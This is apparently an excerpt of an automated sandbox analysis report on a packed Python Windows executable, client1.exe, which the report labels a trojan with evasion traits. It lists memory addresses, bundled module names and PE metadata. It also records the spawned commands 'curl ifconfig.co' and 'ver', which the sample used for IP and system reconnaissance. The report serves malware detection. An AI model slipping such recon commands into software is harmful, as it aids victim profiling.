Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE82FCC2_2_00007FFBAAE82FCC
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE86D572_2_00007FFBAAE86D57
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB034A702_2_00007FFBAB034A70
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8275C2_2_00007FFBAAE8275C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE831892_2_00007FFBAAE83189
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAFC0F602_2_00007FFBAAFC0F60
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8144C2_2_00007FFBAAE8144C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAFACF802_2_00007FFBAAFACF80
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8362F2_2_00007FFBAAE8362F
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE86EBA2_2_00007FFBAAE86EBA
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE810AA2_2_00007FFBAAE810AA
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE81F962_2_00007FFBAAE81F96
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE844032_2_00007FFBAAE84403
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8659B2_2_00007FFBAAE8659B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE81D892_2_00007FFBAAE81D89
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE812172_2_00007FFBAAE81217
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAF304402_2_00007FFBAAF30440
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE9C4802_2_00007FFBAAE9C480
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB0383402_2_00007FFBAB038340
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE814242_2_00007FFBAAE81424
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE85B732_2_00007FFBAAE85B73
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE82C752_2_00007FFBAAE82C75
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE841012_2_00007FFBAAE84101
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAFC00F02_2_00007FFBAAFC00F0
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE84B562_2_00007FFBAAE84B56
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE822AC2_2_00007FFBAAE822AC
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE82D742_2_00007FFBAAE82D74
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE86C1C2_2_00007FFBAAE86C1C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAFAC5E02_2_00007FFBAAFAC5E0
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE869E22_2_00007FFBAAE869E2
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE825EF2_2_00007FFBAAE825EF
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8177B2_2_00007FFBAAE8177B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE9C6202_2_00007FFBAAE9C620
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE838322_2_00007FFBAAE83832
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE872522_2_00007FFBAAE87252
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE829822_2_00007FFBAAE82982
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE850AB2_2_00007FFBAAE850AB
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE81CFD2_2_00007FFBAAE81CFD
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE835FD2_2_00007FFBAAE835FD
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE859F72_2_00007FFBAAE859F7
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83A852_2_00007FFBAAE83A85
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB039A502_2_00007FFBAB039A50
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE863892_2_00007FFBAAE86389
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB0219902_2_00007FFBAB021990
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE847462_2_00007FFBAAE84746
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8378D2_2_00007FFBAAE8378D
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE843592_2_00007FFBAAE84359
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE81B312_2_00007FFBAAE81B31
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE873652_2_00007FFBAAE87365
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAFB5E102_2_00007FFBAAFB5E10
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8266C2_2_00007FFBAAE8266C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83BA22_2_00007FFBAAE83BA2
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE872A72_2_00007FFBAAE872A7
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE816222_2_00007FFBAAE81622
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE82D0B2_2_00007FFBAAE82D0B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE855102_2_00007FFBAAE85510
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE85F0B2_2_00007FFBAAE85F0B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE842872_2_00007FFBAAE84287
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE871082_2_00007FFBAAE87108
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB0392702_2_00007FFBAB039270
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE853A82_2_00007FFBAAE853A8
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE844C62_2_00007FFBAAE844C6
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE9D2602_2_00007FFBAAE9D260
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAEA52002_2_00007FFBAAEA5200
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE868C52_2_00007FFBAAE868C5
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE85BF02_2_00007FFBAAE85BF0
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE821352_2_00007FFBAAE82135
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8216C2_2_00007FFBAAE8216C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE853C12_2_00007FFBAAE853C1
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE84F3E2_2_00007FFBAAE84F3E
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE815C82_2_00007FFBAAE815C8
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE854CF2_2_00007FFBAAE854CF
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE854CA2_2_00007FFBAAE854CA
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE84AC52_2_00007FFBAAE84AC5
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8655F2_2_00007FFBAAE8655F
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE812992_2_00007FFBAAE81299
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8560F2_2_00007FFBAAE8560F
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8542F2_2_00007FFBAAE8542F
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE850472_2_00007FFBAAE85047
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83A8F2_2_00007FFBAAE83A8F
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAFC15902_2_00007FFBAAFC1590
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB49BB702_2_00007FFBAB49BB70
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE82734 appears 508 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE82A04 appears 172 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAB493710 appears 37 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE81EF1 appears 1578 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE824B9 appears 83 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE8483B appears 126 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE84057 appears 774 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE86988 appears 48 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE8300D appears 55 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FF79F622770 appears 82 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE84D68 appears 33 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE86889 appears 31 times
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.0.drStatic PE information: No import functions for PE file found
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs client1.exe
Source: client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs client1.exe
Source: client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs client1.exe
Source: client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs client1.exe
Source: client1.exeBinary or memory string: OriginalFilename vs client1.exe
Source: client1.exe, 00000002.00000002.2696109172.00007FFBAB685000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2695346488.00007FFBAB1C6000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs client1.exe
Source: client1.exe, 00000002.00000002.2696789815.00007FFBBB5D6000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2697165497.00007FFBBB64B000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2696701429.00007FFBBB556000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2694790044.00007FFBAAE08000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs client1.exe
Source: client1.exe, 00000002.00000002.2695939389.00007FFBAB65B000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenamelibsslH vs client1.exe
Source: client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs client1.exe
Source: client1.exe, 00000002.00000002.2696918364.00007FFBBB605000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2697025018.00007FFBBB622000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2691113570.000001692E700000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs client1.exe
Source: client1.exe, 00000002.00000002.2697299452.00007FFBBCD57000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs client1.exe
Source: client1.exe, 00000002.00000002.2695611712.00007FFBAB4CE000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2696197834.00007FFBB18A2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs client1.exe
Source: classification engineClassification label: mal56.troj.evad.winEXE@11/33@1/3
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6274B0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF79F6274B0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522Jump to behavior
Source: client1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\client1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\client1.exeFile read: C:\Users\user\Desktop\client1.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.co"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.co
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"Jump to behavior
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.co"Jump to behavior
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.coJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libssl-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: client1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: client1.exeStatic file information: File size 11677281 > 1048576
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: client1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696755408.00007FFBBB5D3000.00000002.00000001.01000000.0000000C.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: client1.exe, 00000002.00000002.2697114928.00007FFBBB640000.00000002.00000001.01000000.00000007.sdmp, _ctypes.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2695572139.00007FFBAB4C7000.00000002.00000001.01000000.00000011.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: _bcrypt.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696663196.00007FFBBB553000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696978385.00007FFBBB61D000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696163480.00007FFBB1898000.00000002.00000001.01000000.0000000B.sdmp, _socket.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691113570.000001692E700000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: client1.exe, 00000002.00000002.2693682237.00007FFBAABCC000.00000002.00000001.01000000.00000004.sdmp, python311.dll.0.dr
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: client1.exe, 00000002.00000002.2695138214.00007FFBAB151000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: client1.exe, 00000002.00000002.2696036271.00007FFBAB66D000.00000002.00000001.01000000.0000000D.sdmp, _ssl.pyd.0.dr
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VCRUNTIME140.dll.0.drStatic PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
Source: client1.exeStatic PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: python311.dll.0.drStatic PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6710E4 push rcx; retn 0000h0_2_00007FF79F6710ED
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6710CC push rbp; retn 0000h0_2_00007FF79F6710CD
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6710E4 push rcx; retn 0000h2_2_00007FF79F6710ED
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6710CC push rbp; retn 0000h2_2_00007FF79F6710CD
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C21B0 push rbp; retf 2_2_00007FFBAB1C21B3
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C21E8 push rbp; retf 2_2_00007FFBAB1C21F3
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C21E0 push rbp; retf 2_2_00007FFBAB1C21E3
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2118 push rsi; retf 2_2_00007FFBAB1C211B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2158 push rsi; retf 2_2_00007FFBAB1C215B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2130 push rbp; retf 2_2_00007FFBAB1C2133
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2180 push rsi; retf 2_2_00007FFBAB1C2183
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2168 push rsp; retf 2_2_00007FFBAB1C216B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2088 push rsi; retf 2_2_00007FFBAB1C209B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2080 push rsi; retf 2_2_00007FFBAB1C208B
